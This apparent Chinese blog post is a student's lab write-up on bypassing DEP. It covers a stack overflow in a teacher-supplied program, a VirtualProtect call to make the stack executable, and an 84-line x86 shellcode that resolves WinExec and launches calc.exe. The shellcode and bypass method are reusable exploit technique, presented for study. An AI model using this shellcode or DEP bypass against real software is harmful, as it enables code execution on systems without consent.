<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">
<meta name="baidu-site-verification" content="mLMdqFLzjo" />
<meta name="google-site-verification" content="7uHr04pXNVB5CV_DNSdpXbHErUHjpYDOT-B74_X6vhY" />












<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.5.0" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/icon_180.png?v=6.5.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/icon_32.png?v=6.5.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/icon_16.png?v=6.5.0">


  <link rel="mask-icon" href="/images/logo2.svg?v=6.5.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.5.0',
    sidebar: {"position":"left","width":300,"display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: 'WKHA6YLSNH',
      apiKey: '46dba96b67832c36609d31c01e6772af',
      indexName: 'blog',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="导语这是我的软件安全作业，希望能同学们启发。">
<meta property="og:type" content="article">
<meta property="og:title" content="VirtualProtect绕过DEP">
<meta property="og:url" content="https://www.smartpillar.xyz/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/index.html">
<meta property="og:site_name" content="π1L4r">
<meta property="og:description" content="导语这是我的软件安全作业，希望能同学们启发。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://www.smartpillar.xyz/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/1.png">
<meta property="og:image" content="https://www.smartpillar.xyz/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/2.png">
<meta property="og:image" content="https://www.smartpillar.xyz/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/3.png">
<meta property="og:image" content="https://www.smartpillar.xyz/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/4.png">
<meta property="og:image" content="https://www.smartpillar.xyz/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/5.png">
<meta property="og:image" content="https://www.smartpillar.xyz/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/6.png">
<meta property="og:image" content="https://www.smartpillar.xyz/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/7.png">
<meta property="og:image" content="https://www.smartpillar.xyz/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/8.png">
<meta property="og:image" content="https://www.smartpillar.xyz/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/9.png">
<meta property="article:published_time" content="2020-06-08T05:05:46.000Z">
<meta property="article:modified_time" content="2020-06-08T07:27:07.118Z">
<meta property="article:author" content="π1L4r">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://www.smartpillar.xyz/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/1.png">


  


  <link rel="alternate" href="/atom.xml" title="π1L4r" type="application/atom+xml" />




  <link rel="canonical" href="https://www.smartpillar.xyz/2020/06/08/VirtualProtect绕过DEP/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>VirtualProtect绕过DEP | π1L4r</title>
  











  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">π1L4r</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">Stay sharp, stay cool</p>
      
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />首页</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/about/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br />关于</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />标签</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br />分类</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />归档</a>
  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />搜索</a>
        </li>
      
    </ul>
  

  

  
    <div class="site-search">
      
  
  <div class="algolia-popup popup search-popup">
    <div class="algolia-search">
      <div class="algolia-search-input-icon">
        <i class="fa fa-search"></i>
      </div>
      <div class="algolia-search-input" id="algolia-search-input"></div>
    </div>

    <div class="algolia-results">
      <div id="algolia-stats"></div>
      <div id="algolia-hits"></div>
      <div id="algolia-pagination" class="algolia-pagination"></div>
    </div>

    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
  </div>




    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://www.smartpillar.xyz/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="π1L4r">
      <meta itemprop="description" content="changed my nickname= =.">
      <meta itemprop="image" content="/images/author.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="π1L4r">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">VirtualProtect绕过DEP
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2020-06-08 13:05:46 / 修改时间：15:27:07" itemprop="dateCreated datePublished" datetime="2020-06-08T13:05:46+08:00">2020-06-08</time>
            

            
              

              
            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon"
            >
            <i class="fa fa-eye"></i>
             阅读次数： 
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="导语"><a href="#导语" class="headerlink" title="导语"></a>导语</h1><p>这是我的软件安全作业，希望能同学们启发。</p>
<a id="more"></a>
<p>具体内容是设计一个shellcode绕过DEP保护然后让他打开计算器。</p>
<h1 id="DEP"><a href="#DEP" class="headerlink" title="DEP"></a>DEP</h1><p>数据执行保护 (DEP) 是一套软硬件技术，能够在内存上执行额外检查以防止在不可运行的内存区域上执行代码。 在 Microsoft Windows XP Service Pack 2、 Microsoft Windows Server 2003 Service Pack 1 、 Microsoft Windows XP Tablet PC Edition 2005 、 Microsoft Windows Vista 和 windows 7 中，由硬件和软件一起强制实施 DEP。DEP 有两种模式，如果CPU 支 持内存页NX 属性， 就是硬件支持的DEP。只有当处理器/系统支持NX/XD位（禁止执行）时，windows才能拥有硬件DEP，否则只能支持软件 DEP，相当于只有SafeSEH保护。<br>简单来说就是会检查你的eip指向的内存段属性，如果不是代码段就给你中断了。</p>
<p>DEP的绕过思路一般有以下三个</p>
<ol>
<li>关闭进程DEP</li>
<li>将shellcode存储位置设置为可执行</li>
<li>将shellcode写入可执行的位置</li>
</ol>
<p>这里我们就采取的是思路2，利用VirtualProtect函数来修改shellcode所在内存的属性。</p>
<h1 id="ROP"><a href="#ROP" class="headerlink" title="ROP"></a>ROP</h1><p>说到绕过DEP，首先显然要说说ROP（return-oriented programming），ROP基本原理如下：<br>小部件(gadget)：内存中一个个以ret为结尾的指令序列（非常形象），我们像捡破烂一样收集它们。<br>ret指令：ret指令实际上就是将eip赋为esp指的值，再将esp增加两个字节，也就是将EIP设置为esp指向的值，也就是跳转到栈顶的值所指向的地址。<br>在整个过程中，eip都在我们收集的小部件上，而这些小部件都在代码段，所以DEP不会对他进行什么干涉，也就能事先我们要的功能了。</p>
<h1 id="VirtualProtect"><a href="#VirtualProtect" class="headerlink" title="VirtualProtect"></a>VirtualProtect</h1><p>VirtualProtect，是对应 Win32 函数的逻辑包装函数，它会在呼叫处理程序的虚拟位置空间里，变更认可页面区域上的保护。<br>具体接受的参数如下：<br>BOOL WINAPI VirtualProrect(<br>__in    LPVOID lpAddress ,      //指向需要修改保护属性的页的基地址。<br>__in    SIZE_T dwSize ,         //需改变保护属性的内存大小<br>__in    DWORD flNewProtect ,    //内存保护属性常量<br>__out  PDWORD lpflOldProtect    //原本内存保护属性的保存地址<br>);</p>
<p>flNewProtect可以设置为一下属性：<br>0x10 PAGE_EXECUTE：区域包含可被系统执行的代码。试图读写该区域的操作将被拒绝。<br>0x20 PAGE_EXECUTE_READ：区域包含可执行代码，应用程序可以读该区域。<br>0x40 PAGE_EXECUTE_READWRITE：区域包含可执行代码，应用程序可以读写该区域。<br>0x80 PAGE_EXECUTE_WRITECOPY： 启用对文件映射对象的映射视图的只读或写时复制访问。<br>0x01 PAGE_NOACCESS：任何访问该区域的操作将被拒绝。<br>0x02 PAGE_READONLY：该区域为只读。如果应用程序试图访问区域中的页的时候，将会被拒绝访问。<br>0x04 PAGE_READWRITE：区域可被应用程序读写。<br>详细内容请参考<a href="https://docs.microsoft.com/zh-cn/windows/win32/memory/memory-protection-constants" target="_blank" rel="noopener">memory protection constants</a></p>
<p>利用VirtualProtect函数，我们就可以改变栈内内存的属性，使其变为可执行。</p>
<h1 id="实际操作"><a href="#实际操作" class="headerlink" title="实际操作"></a>实际操作</h1><p>打开老师发给我的程序，看看它是做什么的<br><img src="/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/1.png" alt><br>他是导入一个文本文件然后将他的内容显示到文本框中，并且经过导入图片测试发现他并不能二进制打开文件并回显。<br>对这个程序栈溢出攻击，构造一个定位的payload<br><img src="/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/2.png" alt><br>用windbg previewer来查看（因为他会在出错的地方中断但不处理，相当于自动断点，比较好使），这里还要记下esp的内容，在后面有用。<br><img src="/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/3.png" alt><br>发现eip被覆盖为了0x68676665，也就是ascii的efgh，也就定位到了调用函数的返回地址，同时也可以查看堆栈的内存情况<br><img src="/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/4.png" alt><br>下一步我们要做的就是覆盖返回地址为VirtualProtect函数的地址，使用ida查看引入函数表，找到VirtualProtect函数<br><img src="/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/5.png" alt><br>值得注意的是，这里存放的是指向VirtualProtect函数的指针的地址，因此我们用OD打开这个程序，到对应地址找到VirtualProtect真正的地址<br><img src="/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/6.png" alt><br>去那里验证一下是不是VirtualProtect,顺便加个断点，以便于之后的调试。<br><img src="/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/7.png" alt><br>然后就是存放参数，在调用函数时候，函数地址后面会有两个DWORD被系统自己压栈，他们分别存放的是call之后下一条语句的地址和当前的ebp，这两个值没什么关系，因为改好了内存属性之后我们编写的shellcode会有对应的堆栈操作来使堆栈可以使用。而且call下一条语句由于VirtualProtect有ret指令也会直接将eip变为esp所指向的位置。<br>然后我们挨个往下放好参数即可，其中修改的内存基地址是在之前看的esp的内容。<br><img src="/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/8.png" alt><br>利用之前的断点，可以看到call的参数（在右下角），这里我随便找了个之前用aaaa覆盖的地址来存放修改前的内存属性。<br><img src="/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/9.png" alt><br>然后我们在网上找个打开计算器的shellcode（当然自己写更好）</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br></pre></td><td class="code"><pre><code class="hljs x86asm">_asm<br>    &#123;<br>        //寻找kernel32<span class="hljs-number">.</span>dll的基地址<br>        <span class="hljs-keyword">xor</span> <span class="hljs-built_in">ecx</span>, <span class="hljs-built_in">ecx</span><span class="hljs-comment">;</span><br>        <span class="hljs-keyword">mov</span> <span class="hljs-built_in">eax</span>, <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span> <span class="hljs-built_in">fs</span> : [<span class="hljs-built_in">ecx</span> + <span class="hljs-number">30h</span>]<span class="hljs-comment">; //EAX = PEB</span><br>        <span class="hljs-keyword">mov</span> <span class="hljs-built_in">eax</span>, <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span>[<span class="hljs-built_in">eax</span> + <span class="hljs-number">0Ch</span>]<span class="hljs-comment">; //EAX = PEB-&gt;Ldr</span><br>        <span class="hljs-keyword">mov</span> <span class="hljs-built_in">esi</span>, <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span>[<span class="hljs-built_in">eax</span> + <span class="hljs-number">14h</span>]<span class="hljs-comment">; //ESI = PEB-&gt;Ldr.InMemOrder</span><br>        lods <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span>[<span class="hljs-built_in">esi</span>]<span class="hljs-comment">; //EAX = Second module</span><br>        <span class="hljs-keyword">xchg</span> <span class="hljs-built_in">eax</span>, <span class="hljs-built_in">esi</span><span class="hljs-comment">; //EAX = ESI, ESI = EAX</span><br>        lods <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span>[<span class="hljs-built_in">esi</span>]<span class="hljs-comment">; //EAX = Third(kernel32)</span><br>        <span class="hljs-keyword">mov</span> <span class="hljs-built_in">ebx</span>, <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span>[<span class="hljs-built_in">eax</span> + <span class="hljs-number">10h</span>]<span class="hljs-comment">; //EBX = Base address</span><br>        //查找kernel32<span class="hljs-number">.</span>dll的导出表<br>        <span class="hljs-keyword">mov</span> <span class="hljs-built_in">edx</span>, <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span>[<span class="hljs-built_in">ebx</span> + <span class="hljs-number">3Ch</span>]<span class="hljs-comment">; //EDX = DOS-&gt;e_lfanew</span><br>        <span class="hljs-keyword">add</span> <span class="hljs-built_in">edx</span>, <span class="hljs-built_in">ebx</span><span class="hljs-comment">; //EDX = PE Header</span><br>        <span class="hljs-keyword">mov</span> <span class="hljs-built_in">edx</span>, <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span>[<span class="hljs-built_in">edx</span> + <span class="hljs-number">78h</span>]<span class="hljs-comment">; //EDX = Offset export table</span><br>        <span class="hljs-keyword">add</span> <span class="hljs-built_in">edx</span>, <span class="hljs-built_in">ebx</span><span class="hljs-comment">; //EDX = Export table</span><br>        <span class="hljs-keyword">mov</span> <span class="hljs-built_in">esi</span>, <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span>[<span class="hljs-built_in">edx</span> + <span class="hljs-number">20h</span>]<span class="hljs-comment">; //ESI = Offset names table</span><br>        <span class="hljs-keyword">add</span> <span class="hljs-built_in">esi</span>, <span class="hljs-built_in">ebx</span><span class="hljs-comment">; //ESI = Names table</span><br>        <span class="hljs-keyword">xor</span> <span class="hljs-built_in">ecx</span>, <span class="hljs-built_in">ecx</span><span class="hljs-comment">; //EXC = 0</span><br>        //循环查找GetProcAddress函数<br><span class="hljs-symbol">    Get_Function:</span><br>        <span class="hljs-keyword">inc</span> <span class="hljs-built_in">ecx</span><span class="hljs-comment">; //Increment the ordinal</span><br>        lods <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span>[<span class="hljs-built_in">esi</span>]<span class="hljs-comment">; //Get name offset</span><br>        <span class="hljs-keyword">add</span> <span class="hljs-built_in">eax</span>, <span class="hljs-built_in">ebx</span><span class="hljs-comment">; //Get function name</span><br>        <span class="hljs-keyword">cmp</span> <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span>[<span class="hljs-built_in">eax</span>], <span class="hljs-number">50746547h</span><span class="hljs-comment">; //GetProcAddress</span><br>        <span class="hljs-keyword">jne</span> Get_Function<span class="hljs-comment">; //Get_Function</span><br>        <span class="hljs-keyword">cmp</span> <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span>[<span class="hljs-built_in">eax</span> + <span class="hljs-number">4</span>], <span class="hljs-number">41636F72h</span><span class="hljs-comment">; //rocAddress</span><br>        <span class="hljs-keyword">jne</span> Get_Function<span class="hljs-comment">; //Get_Function</span><br>        <span class="hljs-keyword">cmp</span> <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span>[<span class="hljs-built_in">eax</span> + <span class="hljs-number">8</span>], <span class="hljs-number">65726464h</span><span class="hljs-comment">; //ddress</span><br>        <span class="hljs-keyword">jne</span> Get_Function<span class="hljs-comment">; //Get_Function</span><br>        //寻找GetProcAddress 函数<br>        <span class="hljs-keyword">mov</span> <span class="hljs-built_in">esi</span>, <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span>[<span class="hljs-built_in">edx</span> + <span class="hljs-number">24h</span>]<span class="hljs-comment">; //ESI = Offset ordinals</span><br>        <span class="hljs-keyword">add</span> <span class="hljs-built_in">esi</span>, <span class="hljs-built_in">ebx</span><span class="hljs-comment">; //ESI = Ordinals table</span><br>        <span class="hljs-keyword">mov</span> <span class="hljs-built_in">cx</span>, <span class="hljs-built_in">word</span> <span class="hljs-built_in">ptr</span>[<span class="hljs-built_in">esi</span> + <span class="hljs-built_in">ecx</span> * <span class="hljs-number">2</span>]<span class="hljs-comment">; //CX = Number of function</span><br>        <span class="hljs-keyword">dec</span> <span class="hljs-built_in">ecx</span><br>            <span class="hljs-keyword">mov</span> <span class="hljs-built_in">esi</span>, <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span>[<span class="hljs-built_in">edx</span> + <span class="hljs-number">1Ch</span>]<span class="hljs-comment">; //ESI = Offset address table</span><br>        <span class="hljs-keyword">add</span> <span class="hljs-built_in">esi</span>, <span class="hljs-built_in">ebx</span><span class="hljs-comment">; //ESI = Address table</span><br>        <span class="hljs-keyword">mov</span> <span class="hljs-built_in">edx</span>, <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span>[<span class="hljs-built_in">esi</span> + <span class="hljs-built_in">ecx</span> * <span class="hljs-number">4</span>]<span class="hljs-comment">; //EDX = Pointer(offset)</span><br>        <span class="hljs-keyword">add</span> <span class="hljs-built_in">edx</span>, <span class="hljs-built_in">ebx</span><span class="hljs-comment">; //EDX = GetProcAddress</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-built_in">ebx</span><span class="hljs-comment">; //PUSH kernel32.Base address</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-built_in">edx</span><span class="hljs-comment">; //PUSH kernel32.GetProcAddress</span><br>        //寻找WinExec函数地址<br>        <span class="hljs-keyword">xor</span> <span class="hljs-built_in">ecx</span>, <span class="hljs-built_in">ecx</span><span class="hljs-comment">; //ECX = 0</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-built_in">ecx</span><span class="hljs-comment">; //PUSH ECX</span><br>        <span class="hljs-keyword">mov</span> <span class="hljs-built_in">ecx</span>, <span class="hljs-number">61636578h</span><span class="hljs-comment">; //string acex</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-built_in">ecx</span><span class="hljs-comment">; //PUSH ECX</span><br>        <span class="hljs-keyword">sub</span> <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span>[<span class="hljs-built_in">esp</span> + <span class="hljs-number">3</span>], <span class="hljs-number">61h</span><span class="hljs-comment">; //Remove "a" ESP = &amp;0012FE18---&gt;string xec</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-number">456E6957h</span><span class="hljs-comment">; //string EniW</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-built_in">esp</span><span class="hljs-comment">; //PUSH ESP WinExec</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-built_in">ebx</span><span class="hljs-comment">; //PUSH EBX kernel32.Base address</span><br>        <span class="hljs-keyword">call</span> <span class="hljs-built_in">edx</span><span class="hljs-comment">; //CALL GetProcAddress</span><br>        <span class="hljs-keyword">add</span> <span class="hljs-built_in">esp</span>, <span class="hljs-number">8</span><span class="hljs-comment">; //ESP + 8</span><br>        <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ecx</span><span class="hljs-comment">; //ECX = 0</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-built_in">eax</span><span class="hljs-comment">; //PUSH EAX-- &gt; kernel32.WinExec Addresss</span><br>        //赋值命令行字符串<br>        <span class="hljs-keyword">xor</span> <span class="hljs-built_in">ecx</span>, <span class="hljs-built_in">ecx</span><span class="hljs-comment">; //ECX = 0</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-built_in">ecx</span><span class="hljs-comment">; //PUSH ECX</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-number">0x6578652E</span><span class="hljs-comment">;</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-number">0x636C6163</span><span class="hljs-comment">; //calc.exe</span><br>        <span class="hljs-keyword">xor</span> <span class="hljs-built_in">ebx</span>, <span class="hljs-built_in">ebx</span><span class="hljs-comment">; //EBX = 0</span><br>        <span class="hljs-keyword">mov</span> <span class="hljs-built_in">ebx</span>, <span class="hljs-built_in">esp</span><span class="hljs-comment">; //EBX = "calc.exe"</span><br>        <span class="hljs-keyword">xor</span> <span class="hljs-built_in">ecx</span>, <span class="hljs-built_in">ecx</span><span class="hljs-comment">; //ECX = 0</span><br>        <span class="hljs-keyword">inc</span> <span class="hljs-built_in">ecx</span><span class="hljs-comment">; //EXC = 1</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-built_in">ecx</span><span class="hljs-comment">; //PUSH ECX = 1</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-built_in">ebx</span><span class="hljs-comment">; //PUSH EBX = "calc.exe"</span><br>        <span class="hljs-keyword">call</span> <span class="hljs-built_in">eax</span><span class="hljs-comment">; //CALL WinExec</span><br>        //堆栈平衡<br>        <span class="hljs-keyword">add</span> <span class="hljs-built_in">esp</span>, <span class="hljs-number">10h</span><span class="hljs-comment">; //ESP + 50h</span><br>        <span class="hljs-keyword">pop</span> <span class="hljs-built_in">edx</span><span class="hljs-comment">; //EDX = kernel32.GetProcAddress</span><br>        <span class="hljs-keyword">pop</span> <span class="hljs-built_in">ebx</span><span class="hljs-comment">; //EBX = kernel32.Base Address</span><br>        //退出程序<br>        <span class="hljs-keyword">xor</span> <span class="hljs-built_in">ecx</span>, <span class="hljs-built_in">ecx</span><span class="hljs-comment">; //ECX = 0</span><br>        <span class="hljs-keyword">mov</span> <span class="hljs-built_in">ecx</span>, <span class="hljs-number">61737365h</span><span class="hljs-comment">; //string asse</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-built_in">ecx</span><span class="hljs-comment">; //PUSH ECX</span><br>        <span class="hljs-keyword">sub</span> <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span>[<span class="hljs-built_in">esp</span> + <span class="hljs-number">3</span>], <span class="hljs-number">61h</span><span class="hljs-comment">; //Remove "a"</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-number">636F7250h</span><span class="hljs-comment">; //string; Proc</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-number">74697845h</span><span class="hljs-comment">; //string; Exit</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-built_in">esp</span><span class="hljs-comment">; //string "ExitProcess"</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-built_in">ebx</span><span class="hljs-comment">; //kernel32.dll base address</span><br>        <span class="hljs-keyword">call</span> <span class="hljs-built_in">edx</span><span class="hljs-comment">; //GetProcAddress(Exec)</span><br>        <span class="hljs-keyword">xor</span> <span class="hljs-built_in">ecx</span>, <span class="hljs-built_in">ecx</span><span class="hljs-comment">; //ECX = 0</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-built_in">ecx</span><span class="hljs-comment">; //Return code = 0</span><br>        <span class="hljs-keyword">call</span> <span class="hljs-built_in">eax</span><span class="hljs-comment">; //ExitProcess</span><br>    &#125;<br></code></pre></td></tr></table></figure>
<p>导出机器码，直接用winhex贴在被修改了内存属性的地址之后即可。<br>然后使用程序打开shellcode，就可以发现自动的弹出了计算器。</p>
<h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><p>如果想要自动生成rop的话推荐<a href="https://github.com/corelan/mona" target="_blank" rel="noopener">mona插件</a><br>冲冲冲！</p>
<p>参考：<br><a href="https://www.cnblogs.com/Wrong-Side/p/4547754.html" target="_blank" rel="noopener">https://www.cnblogs.com/Wrong-Side/p/4547754.html</a><br><a href="https://www.cnblogs.com/lei9019/archive/2012/02/20/2359020.html" target="_blank" rel="noopener">https://www.cnblogs.com/lei9019/archive/2012/02/20/2359020.html</a><br><a href="https://www.cnblogs.com/bCPTdtPtp/p/12382726.html" target="_blank" rel="noopener">https://www.cnblogs.com/bCPTdtPtp/p/12382726.html</a></p>

      
    </div>

    

    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>π1L4r</li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://www.smartpillar.xyz/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/" title="VirtualProtect绕过DEP">https://www.smartpillar.xyz/2020/06/08/VirtualProtect%E7%BB%95%E8%BF%87DEP/</a>
  </li>
  <li class="post-copyright-license">
